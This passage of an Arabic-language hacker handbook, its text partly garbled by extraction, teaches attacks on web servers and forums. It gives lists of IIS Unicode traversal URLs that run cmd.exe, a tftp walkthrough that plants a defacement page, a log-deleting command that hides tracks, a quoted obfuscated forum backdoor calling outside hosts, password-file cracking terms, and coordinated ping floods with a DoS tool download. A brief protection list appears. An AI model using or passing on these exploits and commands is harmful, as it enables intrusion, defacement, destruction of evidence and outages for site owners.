/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\<br />

/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system<br />

32/cmd.exe\?/c\+dir+c:\<br />

٧٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

:<br />

وطریقةتنفیذها من المتصفح<br />

ومكانتنفیذها بعداسمالموقع<br />

مثال<br />

http://www.xxxxx.<strong>com</strong>/à/€/à/€/à/€/¯....2/cmd.exe/? /c \+<br />

أي بعد دوتكوم<br />

بع ضالناس یسألون مالذي یظهراو علىاي شكل یظهر<br />

الحلبسی ط<br />

Dirهذاالامرلوقمت بكتابتهفي نافذة الدوس ستظهرلكالملفات<br />

وطریقة ظهور الملفاتفيالمتصفحتقریبا<br />

بنفس طریقة الدوس<br />

إ ذا نجحتفيتنفیذ الثغرة واظهرتالملفا تامامك فتبدأفيتنفیذالخطوةالثانیة<br />

الخطوة الثانیة عملابلودللمل فالذيتریدتحمیله<br />

وعمل الأبلودأیضاً‏ لایحتاج الى خبرة<br />

لكن هنالكشروطلكيتعملابلود<br />

یجب التأكد منأن التيإفتيبي مثبت علىالموقعالض حیة<br />

وللكي تتأكدإتبعالاتي<br />

یجب الدخول على مل ف السستم‎٣٢‎ ولكيتد خله یجبأنتضی ف بع ض الكلمات علىالثغرةالتي نجحتفي<br />

تنفیذها<br />

مثال :<br />

../winnt/system32/cmd.exe?/c+dir+c:\ http://www.xxxxxx.<strong>com</strong>/scripts/..Á<br />

هذه الثغرة عملتفيالموقع المطلوب ورأیت الملفات<br />

لاحظالتغیر<br />

http://www.xxxxxx.<strong>com</strong>/scripts/..Á<br />

../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32\<br />

ماوضع علىالثغرة هوأسماءلملفات متواجدة داخل الویندوز Winnt\Sytem32\<br />

أي یجب علیكالدخول على هذه الملفاتلكي تتأكد<br />

بع ضالقراءیتسالون ‏.....الثغرةالتي نستخدمهالیست متطابقة<br />

للتطابقها یجب علیك الدخولبايكان على ملل ف السستم<br />

ممكن یكوناحدالقراءاشتغلتمعاه هذه الثغرة<br />

http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€....exe?/c+dir+c:\<br />

ویقولكی فادخل على مل فالسستم<br />

الحل هو واحد یجب علیكإ ضافةاسماء الملفاتلكيتدخل علىالسستم‎٣٢‎<br />

اي بعد هذاالامتداد<br />

‏\:‏c+dir+cهناتضی فأسماء الملفات<br />

http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€...Winnt/System32/<br />

كماقلنا سابقاَلاتحتاج الى خبرة<br />

وبعد دخول مل فالسستم ستظهرلك محتویاته<br />

ویجب على آنذاك الب حث عنبرنامج یسمي<br />

tftp.exeیعني دور على هذاالبرنامجالین ماتلقاهوتتأكد منانهفيالجهاز<br />

لان هذاالبرنامجیعتبر شرطلكيتعملابلودللصفحة<br />

ولولقیتالبرنامج اتفاءلبالخیریعنيبإذنااللهتعبك ماهو رایح على الفاضي<br />

مع هذه الثغرة ولكن هذالیس شرط<br />

٧٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

C:\<br />

.........................................................................................<br />

والشرطالثاني هو<br />

یجبأن یكون عندكبرنامجالتيإ فتيبي<br />

وهذا البرنامجتقدرتنزله من هذا العنوان<br />

www.geocities.<strong>com</strong>/anorR1234/tftpd32.zip<br />

‏\:‏Cوبعد ماتنزل البرنامجوتفكالضغط منه منالافضلإنكت حطه داخلال<br />

وتحطأیضا البرامجأو الصفحةالتيتریدأنتعمللهاأبلودفيالسي<br />

ت حطهفيالسي الى داخل جهازك مو الى دالخل الموقع<br />

وتشغل البرنامج<br />

tftp32.exeوتتركهیعملالىأنتنتهى من مهمتكالأساسیة<br />

أسمعكلامي وحطكل شيفي<br />

لأنكلو حطیتهابإذناالله را حتنجح المهمه<br />

-----------------------------------------------------------------<br />

الانبدأنافي النقطةالخطرة وهيتحمیلالملفات<br />

مع العلمأنياقصدبالتحمیلالابلود<br />

أي<br />

أبلود ‏=تحمیل<br />

موتجمیل<br />

وتحمیلالملفات طریقةمعقدة نسبیاًبسأنا متفائلبالخیرلأنيمعتقدأنكم راحتفهمو<br />

المهم نرجعلموضوعنا<br />

المهم طریقة نسخالملفاتتضا فایضاً‏ الىالمتصفح<br />

وتضا فبهذه الطریقة<br />

: مثال<br />

http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€....exe?/c+dir+ c : \<br />

تخیل الثغرة هذهاشتغلتمعاك<br />

ویجب علیكإنكتمسح بع ضالإ ضافات من الثغرةلكيتضی ف امرالنسخ<br />

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm<br />

یعني الى راح نمسحه منالثغرةبیكون هذهالاضافة<br />

/c + dir+c:\<br />

عشانتظی فبدالها<br />

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm<br />

ولمن نظی فامر النسخ بیطلعلنابهذا الطریقة<br />

"-http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€...xe?/c+tftp.exe+<br />

i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm<br />

شایفین یاشبابإ شالى اتغیر<br />

بس لازمأیضاًإنكتغیراللازمفيأمرالنسخ<br />

مثل<br />

tftp.exeهذا سیبهفي حاله لانهاسمبرنامج التيا فتيبي الى حاطهفي السي ومشغلهالان<br />

"i - ‏"هذابرضه سیبه لانه مهم<br />

‎1.1.1.1‎هنابدالالارقام هذاتكتبالایبيتبع جهازك وعشان تتأكد منالایبيلمنتشغبالتيا فتيبي<br />

راح یطلع ایبي وهذاالایبيالى طلعلك هوالىتكتبه<br />

GETهذهالاضافة سیبهافي حالها لانهاتعتبر شرطفي نسخ المفات<br />

٧٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

index.htmهذهاسمالصفحة الى راح تتحمل وممكنتغیرها عاد بكیفكانت<br />

‏\‏C:\inetpub\wwwrootوهذا مكانتواجدالصفحةالرئیسة الخاصةبالموقع<br />

index.htmهناتكتبإسمالصفحةاوالمل فالتيتریدهأن یظهرفيالموقع<br />

‏\:‏Cیجبالتأكد منإنك حاطالصفحة المرادتحمیلهافي جهازك داخلال<br />

index.htmومثلااسم الصفحة<br />

قبل ماتضغطانتر عشانتنسخالمل فتاكد منان الثغرةالان صارت مشابهالمثل هذه الثغرة<br />

"-http://www.xxxxx.<strong>com</strong>/scripts/..ü€€€...xe?/c+tftp.exe+<br />

i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm<br />

ولو طلعت مشابهالهااضغ ط إنتروتوكل علىاالله<br />

وبإذناالله راحیتنسخ المل ف<br />

------------------------------------------------------------------------------------------------------<br />

--------------------------------------------------------------------------------<br />

وفى النقطةالا خیرة والاهم<br />

مسح ملفاتتكونتجمعت داخل الجهاز ومكونة معلومات عنك مثلالایبي<br />

http://server/msadc/..À¯../..../c+del+c:/*.log<br />

--------------------------------------<br />

**************************************************************************************<br />

‎٥‎‏-النسخه المنتشرهفي النت ودورالمعربین العرب وحقیقةالموضو عوتعریبهم<br />

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />

اولاكماقلنالماذا لایخترقوا منتدیات جون ر غ مثغرات موقعه ‎<strong>١</strong>‎لانه یستخدم نسخه نضیفه<br />

‎<strong>١</strong>‎‏-النسخه الموجودبالنت ملیانثغرات وعارفین جید مصمممي المنتدي لاماذا ینشرونه اذا$‏<br />

النسخهتجریبي ومحتويكود التبلیغ لاكيلو نفذت ومسحتكودالتبلیغلنتهرب منثغراتهلوتشغل<br />

فكركلكشفتهبنفسك<br />

٢ ‏-انه جمیعه نسخهتجریبي لترویجبضعتهمبدلاانتكونلمدة ‎٣٠‎یومافهمتموني<br />

‎٣‎‏-النسخهالامنتشرهبالانترنت هو نسخه نحصل علي من مواقع هكرز صح وینكانت من هكرزالغرب<br />

وحیلهم<br />

لوتمكنتفي ال حصول علي نسخةالشركة <strong>١</strong>٠٠% ونسخه منتشرهفيالنتلرئیت صحقاموابحذ فكود<br />

التبلیغ منهبلاضافواالیهكوداد وبلاويوثغرا ت-وبعدین یجيالا خ صاحب النسخه یوكدانهلقيثغرة<br />

بمنتدیات جون<br />

والعالم ینده شكیییییی ف خلا صانشهر موقعه وسعراعلاناتهارتفعفي موقعهلكثرالزوار<br />

الحقیقة هو نفسهاضا ف الكود ونفسهیعر ف مكانه وكیفةالعبفیه واالله هكذاالامور<br />

المعربینالعربلیسوااقل نذلا من الاجانب<br />

انصحكم بتعریب نسخكمباانفسكم<br />

٧٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

قبل فترهبسیطهتم اكتشا فثغرهفي بع ض نسخ ‎٢٫٢٫٥‎المسربهلنا مناخوانناالعرب وكان هذاالكود<br />

الموجودفیهافي مل فforum<br />

PHP:<br />

--------------------------------------------------------------------------------<br />

if ($action=="modify") {<br />

$<strong>vb</strong>xh = h;<br />

$<strong>vb</strong>xt = t;<br />

$<strong>vb</strong>xp = p;<br />

$<strong>vb</strong>xw = w;<br />

$<strong>vb</strong>xa = a;<br />

$<strong>vb</strong>x1 = 1;<br />

$<strong>vb</strong>xr = r;<br />

$<strong>vb</strong>xb = b;<br />

$<strong>vb</strong>xn = n;<br />

$<strong>vb</strong>xe = e;<br />

$<strong>vb</strong>xo = o;<br />

$<strong>vb</strong>xy =y;<br />

$<strong>vb</strong>xl = l;<br />

echo "";<br />

--------------------------------------------------------------------------------<br />

وكان الكودال حلو هذایتصلفي موقع<br />

http://www.arab1.net/<br />

http://www.arab1.net/~royal/.x.php?h=<br />

$HTTP_HOST&h2=$SCRIPT_NAME<br />

عموما معالایام نزل ت نسخه ٢٫٢٫٦ وسربوهالنا حبایبنا وشالواكودالتبلیغ یاعیني علیهم عشان ی حطون<br />

لناكودتجسس ونعمالاخوه العربالمسلمین<br />

بس هالمرهالكوداذكى ومهو مكشو ف وغبي زيالاولالكودالمره هذيفي ملفین ملف optionبالاخیر<br />

موجود<br />

PHP:<br />

--------------------------------------------------------------------------------<br />

echo "


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

echo " -->";<br />

--------------------------------------------------------------------------------<br />

ومل فfunctions<br />

PHP:<br />

--------------------------------------------------------------------------------<br />

$sqlupdate =<br />

base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmN<strong>vb</strong>S9+cm9<br />

5YWwvLngyLmluYw==');<br />

--------------------------------------------------------------------------------<br />

یاعیني علىالذكاء صرنانعر ف نلعبباكدوا دیكود وانكود والمره هذي بعدیتص ل الكود ال حلو هذااللي<br />

مستخدمینفیه دیكودبالموقع هذا<br />

.<br />

http://saudi.no-ip.<strong>com</strong>/<br />

بیرحبفیكم ویقولكمarab1.net WELCOME TO<br />

http://saudi.no-ip.<strong>com</strong>/~royal/.x2.inc الليفیهاكود<br />

یاعیني عالترحیب<br />

عموماالكودبیتصلبالصفحه هذي<br />

رهییییییب ویبینلنا ‏.......اللي ی حسبون علیناكمسلمین وعرب<br />

شوفو الكود<br />

PHP:<br />

--------------------------------------------------------------------------------<br />

<br />


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$file = fopen("$open", "r");<br />

$rf = fread($file, 1000);<br />

fclose($file);<br />

?><br />

--><br />

<br />

واخرهكان دار العربفي ملفه هوبیعر ف<br />

************<br />

‎٦‎‏-الحمایه منالمخترقینبنسبة ٨٠% لااجهزتكم ومنتدیاتكم<br />

یااللهكل یوم نسمعاختراق المنتدیاتالیكم الحل<br />

حمایة‎٨٠‎‏%الیكماسباباخترقه وحمایته<br />

- <strong>١</strong> وجودثغراتبمجلدالادمن<br />

-٧<br />

-٨<br />

٧-<br />

‎٢‎‏-ثغرة مجلد مود<br />

‎٣‎‏-ثغرةالاستیل<br />

‎٤‎‏-الهتمل<br />

‎٥‎‏-كوكیز<br />

‎٦‎‏-دعم التلنت<br />

علىالمجلد ویندوزC:\Windows Cfgwiz32.exe<br />

من المل فmisc<br />

٩- وجودبات شبجهازكتمارسلهلك منقبل المخترقل حصولبمعلوماتك<br />

**************************************************************************************<br />

‎٧‎‏-كیفیةالحمایة<br />

^^^^^^^^^^<br />

‎<strong>١</strong>‎‏-قمبحمایة مل فالادمن جیدا .htaccess شغلفقطفي سرفراتالینوك سلیس ویندوز<br />

‎٢‎‏-قمبحمایتهhtaccess‏.‏<br />

٣- لاتركب ستیلاتكثیر یسبببثغرةباالمنتدي<br />

٤- لاتفعللغةالهتملابدا<br />

‎٥‎‏-احذر منالكوكز نظ ف جاهزك دائما<br />

‎٦‎‏-قم بتوقی ف التل نیتلموقع عندمالاتحتاجه<br />

نأكد من عدم وجود مل فباسم Cfgwiz32.exe علىالمجلد ویندوزC:\Windows<br />

٨- دهبلووووويالدنیافیه جاري الب حث عن حلله<br />

‎٩‎‏-قم بتركیببرامجالفیروسا تبجهازك …<br />

٨<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏"مصطلحات مهمة للمبتدئين في اختراق المواقع"‏<br />

$$$$$$$$$$<br />

الكاتب : علي زائر<br />

$$$$$$$$$$<br />

سنعرجفي هذا الموضو ع على مصطلحات وأمورهامة یجبانتعر ف علیها سویاقبلالبدء<br />

=======================================================<br />

تلنت -:(Telnet) و هوبرنامج صغیر موجودفيالویندوز . و هویعملككلاینت<br />

أو وضعیتهتكون دائما كزبون ‏.أيأنباستطاعة هذاالبرنامجالإتصالبالسیرفر<br />

أوالخادم واجراء بع ضالعملیاتكل حسب مستواها و حالتها ‏.یستخدمه الهكرزد غالبال لإتصالبالسیرفر<br />

عبربورتمعین و خصوصابورتالإفتيبي ) ‎٢<strong>١</strong>‎‏)للدخولالىالموقعبطریقة خفیة<br />

Anonymous Mode لعر ض ملفات الموقع و سحب مل فالباسورداو غیره منالبیانا ت.‏<br />

لاستخدامالبرنامج ‏،اذهبالى<br />

Start ==> Run ==> telnet و ستظهر شاشةالتلنت .<br />

------------------------------------------------------------------------<br />

برامج السكانأو -:Scanner و هيبرامج موجودةللمسح علىالمواقع وكش ف<br />

ثغراتهاإن وجدت ‏،فهي سریعة،كماأنهاتملكقاعدةبیانات واسعة وكبیرة<br />

تحتوي علىالثغراتأوالاكسبلویت ‏(‏Exploits‏)التيیتمتطبیقها علىالموقع<br />

لرؤیةفیمااذاكانالسیرفریعاني مناحد ى هذهالثغرا تأم لا . و منأمثلة<br />

هذه البرامج،برنامج<br />

الخ<br />

برمجةالأ خ عمران<br />

ولهذهالبرامجأنوا ع مختلفة ، منهاالتيتقوم بعمل سكان على نظامأو سیرفر<br />

معین مثل البرامجالمختصةبالسكان على سیرفراتال IIS و منهابرامج المسح<br />

علىثغرات السي جيايفقط CGI و ماالى ذلك<br />

Shadow Security Scanner و Stealth و<br />

. Omran Fast<br />

.<br />

-----------------------------------------------------------------------<br />

وهذاالبرنامجا لعربي من<br />

اكسبلویت -:(Exploits) هيبرامجتنفیذیةتنفذ من خلالالمتصفح . ولها عنوانURL ‏،تقوم هذه<br />

الإكسبلویتات بعر ض ملفاتالموقع وتقوم بعضهابالدخول الىالسیرفر و التجولفیه ‏،كماتوجد<br />

اكسبلویتاتتقومبشن هجوم علىبورتمعینفيالسیرفر لعملكرا شله ، و هذا ما یسمى ب<br />

Buffer<br />

. Over Flow Exploits<br />

Unicodes و منهاال CGI Bugs CGIأوال Exploits<br />

Exploits و منهاال ، Exploits ، Buffer Over Flow و منهاال PHP Exploits ‏،و منها<br />

هناكأنوا ع منالإكسبلویت ‏،فمنهاال<br />

الExploits DOS والتيتقوم بعملیة حجبالخدمةللسیرفرإن وجدفیهاالثغرةالمطلوبةلهذاالهجوم<br />

وانلم یكن علىالسیرفرأيفایروول . Fire Wall و هناك بع ضالإكسبلویتات المكتوبةبلغة السي و<br />

یكون امتدادها<br />

هذهالإكسبلویتاتبالذاتتحتاجالىكومبایلر Compilerاوبرنامجا لترجمتها وتحویلها الىاكسبلویت<br />

تنفیذي عادي یستخدم من خلالالمتصفح،‏ و لتحویلالإكسبلویت المكتوب بلغةالسي هذه الىبرنامجا<br />

تنفیذیا ، نحتاجإماالى<br />

نظامالتشغیللینوكساو یونكس ‏،او الىايكومبایلریعمل ضمن نظامالتشغیل ویندوز ‏.أشهر هذه<br />

الكومبایلرس ‏(المترجماتأوالمحولات ‏)برنامجاسمه<br />

نظامالتشغیل ویندوزكما ذكرنا سابقا.‏<br />

----------------------------------------------------------------------<br />

Borland C++ Compiler و هيتعملتحت<br />

. (c.)<br />

٨٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

الجدارالناري -:FireWall هيبرامجتستعملهاالسیرفراتلحمایتها منالولوجالغیر شرعيلنظام<br />

ملفاتها منقبلالمتطفلین ‏.هيتمثل الحمایةللسیرفر طبعا ، ولكنيأنوه بأن الفایروولاتالمستخدمة<br />

لحمایةالسیرفرات ‏(المواقع ‏)تختل ف عنتلك التيتستخدملحمایة الأجهزة<br />

.<br />

----------------------------------------------------------------------<br />

-:Token هو مل فالباسورد المظلل Passwd) (Shadowed و الذي یكونفیهالباسورد<br />

على شكل ‏*أو xأي Shadowed ‏.إن وجدت مل ف الباسورد مظللا ‏،فیجب علیك حینها الب حث عن<br />

مل فالباسوردالغیر المظلل و الذي یسمى<br />

----------------------------------------------------------------------<br />

Anonymouse‏:-هيالوضعیةالخفیة والمجهولة التيتدخلفیهاالىالموقعالمراد اختراقه.هناك<br />

خاصیةفيبرامجالا فتيبيبنفسالإسم ‏،تستطیعانتستعملهافي الدخولالمجهول الىالسیرفر و<br />

سحبالملفات منه وهذهأصبحت نادرة نوعا ماالآن<br />

----------------------------------------------------------------------<br />

Valnerableties‏:-أي الثغراتأو مواضع الضع فالغیر م حصنةأو القابلةللعطب و التيیعاني منها<br />

السیرفر والتيقدتشكل خطراأمنیا علیه مما یؤديالىاستغلالها منقبل الهاكرزفي مهاجمةالسیرفر و<br />

اختراقهأوتدمیره<br />

ما هي مفردها ؟ ، Valnerableأيثغرةأوبالأصح موضعالضع ف والمكانالغیر مؤمنبشكل سلیم<br />

. وتكثر هذهالكلمةفي القوائمالبریدیةللمواقعالمهتمةبالسیكیوریتي وأمنالشبكات و غیرهاكالقائمة<br />

البریدیة الموجودةفي موقع Securityأوباقتراكاو Focus غیرها<br />

. etc/shadow/<br />

.<br />

Shadow file ‏.تجدهفي<br />

.<br />

.<br />

(:<br />

----------------------------------------------------------------------<br />

passwd file<br />

‏:هوالمل فالذي یحتوي علىباسورد الروت وباسوردات الأشخا صالمصرحلهم<br />

بالدخولالىالسیرفر ‏.باسوردالموقع موجودفي نفسالمل ف طبعا و غالبا ما یكون مشفر وبمقیاس DES<br />

.<br />

----------------------------------------------------------------------<br />

الجذرأو ال : root وهو المستخدم الجذري والرئیسيللنظام ‏،لهكلالصلاحیاتفي التعامل مع ملفات<br />

الموقع والسیرفر منإزالةأواضافةأوتعدیلللملفات.‏<br />

غالبا ما یكونباسورد الروتهوباسورد الموقع نفسهفيالمواقع التيتعمل ضمن نظامالتشغیللینوكس<br />

و غیرها<br />

او یونكسأو سولاريأو<br />

. Free BSD<br />

----------------------------------------------------------------------<br />

السیرفر Server ‏:هوالجهازالمستضی فللموقع ‏،اذأنكل ملفاتالموقعتوضعفیهفهو جهازكمبیوتر<br />

عاديكغیره منالأجهزةلكنه ذوامكانیات عالیةككبر حجمالقر صالصلب والرام والكا ش میموري و<br />

سرعته الهائلة ، و هو متصلبا لإنترنت ٢٤ ساعة ، و هذا هو سببكون المواقع شغالة ٢٤ ساعة على<br />

ا لإنترنت :) ‏.قد یستضی فالسیرفرأكثر من موقع واحد،‏ و هذایعتمد من سیرفر لآخر و من شركةلأخر ى.‏<br />

ضربة الهاكرز طبعاهياختراقالسیرفر الذي یملكالكثیر من المواقع ‏،فیسهل حینهااختراق جمیع<br />

المواقع التيتندرجتحته مما یؤديإما الىتدمیرهاأو العبثفي ملفاتهاأوتشویه واجهتهاأو سرقة<br />

بیاناتها وتدمیرهاأو مسحها منالنتتماما ، و هذا ما یحد ثللمواقعالإسرائیلیة و بكثرة و اللهالحمد<br />

- .<br />

جزاكماالله خیراأیهاالمجاهدون وأذكرانيفيأخر مرةاخترقت سیرفر یحتويقرابة ٣٦٧ موقع وحصلت<br />

على جمیع ملفاتالكونفیج الموجودة داخلالسیرفر وفیها طبعاالباسورداتبدون تشفی ركمانعلم وهي<br />

الخاصةبمجلاتالنیوك وكذلكالخاصةبالادمنلبرامج المنتدیات والبقیة من خلال فتحتشفیرالباسوردات<br />

ببرنامج جونتستطیع مباشرة مناختراق الموقع منالا فتيبيبلا عناء وحذ فكل مافیه<br />

. -<br />

-----------------------------------------------------------------------<br />

٨٣


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

) Flow ( Buffer over : وهي نو ع منأنوا عالاكسبلویتاتالتيتستعمللشن هجوم<br />

.<br />

بوفرأوفرفلو<br />

الطفح على نقطةمعینة منالسیرفر مثل الهجوم علىبورتالإفتيبيأو غیرهلأجلاضعا ف اتصال<br />

السیرفر وفصل اتصالهبهذابهذاالبورت و لالغاءالرقعةالموجودةبهاكيیتماستغلالها مجددا - بعد عمل<br />

الكرا شلها طبعا ‏-یتماستغلالهافيمعاودةالإتصاللها وبسهولة و دون وجودأي رقعاو حواجز و<br />

سحبالبیانات منها<br />

و هي شبیهة نوعا ما بعملیة حجبالخدمة ‏-اذأنهاتقوم بعملیةاوفرلود على جزء مركز من<br />

DOS -<br />

السیرفر ...<br />

٨٤


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

داینامیكیة تدمير المواقع<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

.<br />

$$$$$$$$$$$$$$$$<br />

الكاتب MaXhAk2000:<br />

$$$$$$$$$$$$$$$$<br />

-<strong>١</strong><br />

-٢<br />

یعدتدمیرالمواقع من الأشیاء السهلة والنافعة والتي یصحبها خساا ئرفادحةللموقعالمستهد ف<br />

حیثاذاتمتدمیر الموقع وایقافه عنالعمل حتىلولمدة محدودهفسیخسرالموقع خسائربالأ فاو<br />

بالملایین وعلى حسب شهرةالموقع<br />

وتدمیر المواقع لایتمالا بأشتراك مجموعةكبیره لاتقلفيأغلبالأحیان عن ٢٠٠ شخ صأوأكثر<br />

وكلماكثرالعددكلماتمتدمیرالموقعبسرعةأكبر وفي وقت أقصر وهناك مواقعكثیرهتقومبمثل هذاالأمر<br />

منهاالموقعالمكافح الناصرللأ سلام موقع الجادالألكتروني الذيتعر ضلوق ف طالت مدته وعاد بعد ذلك<br />

بقوهاكبر ولایزال الموقع مستمرفي هذه الهجمات والجهاد وقدتمتدمیر موااقعكثیره عن طریق<br />

التعاون مع هذاالموقع ....<br />

وألیةتدمیرالمواقعتكمنفياشاء عدة منها :<br />

استخدام الطرقالتقلیدیةالتي تتم عن طریق الدوسكما سیتمالشرح لاحقاان شاءاالله.‏<br />

استخدام بع ض البرامجالقویه والفاعلة التي اثبتت جدارتهاامام المواقعالمعادیة مثلبرنامجالدرة<br />

الشهیر.‏ والذي سیتم شرحه لاحقاان شاءاالله...‏<br />

٨٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$<br />

م ن ق ول<br />

$$$$$$$$$<br />

"<br />

شرح برنامج<br />

الدرة لتدمير المواقع<br />

"<br />

حملالبرنامج من عملیةبحثبواسطة ملكالبحث جوجل.‏<br />

عند ا لإنتهاء منتحمیلالبرنامج ‏،فك ضغ طالمل ف ، و عندتشغیله سیظهرلكالشكلالتالي<br />

:<br />

لبدء الهجومفقطإ ضغط على<br />

ولإیقا فالهجومإ ضغط على<br />

عندبدءالهجوم سیعملبرنامجالدرة علىبح ثالبروكسيالخا صبك و سیضعهلكفي مكانه.‏<br />

و لتخفيهویتك عند الهجومقم بتشغیل:‏<br />

٨٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

و ضع رقمالبروكسيالتالي<br />

وسیكون عنوان الموقع المراد الهجوم علیه هنا<br />

و من خوا ص هذا البرنامجانه لا یستطیعاحدتغییر جهة الهجوم ولتجدید عنوانالموقعالمرادالهجوم<br />

علیهفقطقمبضغط وهو سیقومتلقائیابالبح ث والتغییر.‏<br />

ولمعرفة آخراخبارالبرنامج والمواقع التيتمالنجاح بقصفهافقطقمبضغط<br />

:<br />

و سیظهرلكالشكل التالي<br />

:<br />

قمبضغط<br />

و ستظهرلكالأخبار .<br />

و لعملالبرنامجبطریقة ذكیةب حی ث لا یبطيء ا لإنترنت ‏،قم بتشغیل<br />

:<br />

٨٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

لتشغیلالبرنامج عند عمل الوندوزقم بتشغیل:‏<br />

الشكل التالي یمثل عدد المراتالناجحة<br />

و هذا یمثل عددالمرات الفاشلة<br />

:<br />

:<br />

وصلةتحمیلالبرنامج ..<br />

http://www.geocities.<strong>com</strong>/boom_q8y4/dorrah.zip<br />

…<br />

٨٨


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

تدمير المواقع بدون برامج<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

$$$$$$$$$$$$$$$$<br />

الكاتب MaXhAk2000:<br />

$$$$$$$$$$$$$$$$<br />

في هذا الدرس سأقومبشرح عدة طرق لتدمیر المواقعبدونبرامج ولكن هناك شرط لتدمیرهاأن یجتمع<br />

عددكبیرقد یصلفي بع ض الأ حیان الىاعلى من ٢٠٠ شخ ص علىالموقع نفسه ویقوموا بتطیقالطریقة<br />

معا بع ضفي نفسالوق ت...‏<br />

الطریقة الأولى::‏<br />

قمبالتوجهإلى<br />

" الدوس"‏ ===>== اكتبالأمرالتالي ‏:<br />

یعنياسمالموقع<br />

بعد ذلك سیخرجلك رقمأيبي الموقع.‏<br />

قم بكتابةالأمر:‏<br />

Ping www.xx.<strong>com</strong><br />

Xxx<br />

‏(اسمالموقع)‏ ‏(قوةالضربه)‏ I- ‏(عددالضربا ت)‏ ping n-<br />

مثال ذلك :<br />

الطریقةالثانیة::‏<br />

بعداستخراج الأيبيتبعالموقع المرادبالطریقةاليفي الأعلى...‏<br />

قم بكتابةالأمر:‏<br />

ping -t ip<br />

حیث ipیعنيأيبيالموقعالموراد....‏<br />

ping -n 1000 -l 400 www.xxx.<strong>com</strong><br />

٨٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" Routing in the Internet<br />

www.3 asfh.<strong>com</strong>/<strong>vb</strong><br />

"<br />

معلومات عن<br />

.....<br />

$$$$$$$$$$$$$$$$$$<br />

الكاتب BURN_EG: ACID<br />

$$$$$$$$$$$$$$$$$$<br />

موضو ع هاملنقطة هامةفيالشبكات واوداناضیفاضافةبسیطة وهيانالروتیر هو جهازللتوصیل<br />

بین عدة شبكات متباعدة (( ولمنیعر ففكرةالخب HUBفال Router یقومبنقس المهمة وهو جهاز<br />

